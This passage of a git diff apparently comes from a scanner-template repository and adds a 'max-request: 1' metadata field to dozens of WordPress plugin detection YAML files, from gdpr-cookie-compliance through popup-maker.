https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: 